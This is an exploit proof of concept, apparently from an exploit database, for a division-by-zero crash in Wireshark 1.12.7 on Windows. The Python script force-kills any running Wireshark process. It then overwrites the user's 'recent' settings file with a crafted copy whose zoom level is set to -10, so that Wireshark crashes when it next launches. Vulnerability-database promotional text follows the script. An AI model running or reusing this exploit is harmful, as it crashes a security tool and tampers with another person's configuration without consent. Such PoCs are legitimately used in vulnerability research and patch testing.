# Exploit Title: Wireshark 1.12.7 Division by zero DOS PoC
# Date: 02/09/2015
# Exploit Author: spyk <spyk[dot]developpeur[at]gmail[dot]com> @SwanBeaujard
# Vendor Homepage: https://www.wireshark.org/
# Software Link: https://www.wireshark.org/download.html
# Version: 1.12.7
# Tested on: Windows 7
# Thanks to my professor @St0rn https://www.exploit-db.com/author/?a=8143
import os
import subprocess
import getpass
drive=os.getenv("systemdrive")
user=getpass.getuser()
path="%s\\Users\\%s\\AppData\\Roaming\\Wireshark\\recent" %(drive,user)
def wiresharkIsPresent():
ps=subprocess.check_output("tasklist")
if "Wireshark.exe" in ps:
return 1
else:
return 0
def killWireshark():
try:
res=subprocess.check_output("taskkill /F /IM Wireshark.exe /T")
return 1
except:
return 0
if wiresharkIsPresent():
if killWireshark():
print "Wireshark is killed!"
sploit="""
# Recent settings file for Wireshark 1.12.7.
#
# This file is regenerated each time Wireshark is quit
# and when changing configuration profile.
# So be careful, if you want to make manual changes here.
# Main Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.toolbar_main_show: TRUE
# Filter Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.filter_toolbar_show: TRUE
# Wireless Settings Toolbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.wireless_toolbar_show: FALSE
# Show (hide) old AirPcap driver warning dialog box.
# TRUE or FALSE (case-insensitive).
gui.airpcap_driver_check_show: TRUE
# Packet list show (hide).
# TRUE or FALSE (case-insensitive).
gui.packet_list_show: TRUE
# Tree view show (hide).
# TRUE or FALSE (case-insensitive).
gui.tree_view_show: TRUE
# Byte view show (hide).
# TRUE or FALSE (case-insensitive).
gui.byte_view_show: TRUE
# Statusbar show (hide).
# TRUE or FALSE (case-insensitive).
gui.statusbar_show: TRUE
# Packet list colorize (hide).
# TRUE or FALSE (case-insensitive).
gui.packet_list_colorize: TRUE
# Timestamp display format.
# One of: RELATIVE, ABSOLUTE, ABSOLUTE_WITH_DATE, DELTA, DELTA_DIS, EPOCH, UTC, UTC_WITH_DATE
gui.time_format: RELATIVE
# Timestamp display precision.
# One of: AUTO, SEC, DSEC, CSEC, MSEC, USEC, NSEC
gui.time_precision: AUTO
# Seconds display format.
# One of: SECONDS, HOUR_MIN_SEC
gui.seconds_format: SECONDS
# Zoom level.
# A decimal number.
gui.zoom_level: -10
# Bytes view.
# A decimal number.
gui.bytes_view: 0
# Main window upper (or leftmost) pane size.
# Decimal number.
gui.geometry_main_upper_pane: 440
# Main window middle pane size.
# Decimal number.
gui.geometry_main_lower_pane: 428
# Packet list column pixel widths.
# Each pair of strings consists of a column format and its pixel width.
column.width: %m, 59, %t, 84, %s, 154, %d, 154, %p, 56, %L, 48, %i, 1285
# Last directory navigated to in File Open dialog.
gui.fileopen_remembered_dir: """+drive+"""\\Users\\"""+user+"""\\Documents\\
"""
try:
f=open(path,"w")
f.write(sploit)
f.close()
print "Success!"
except:
print "Fail :("Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation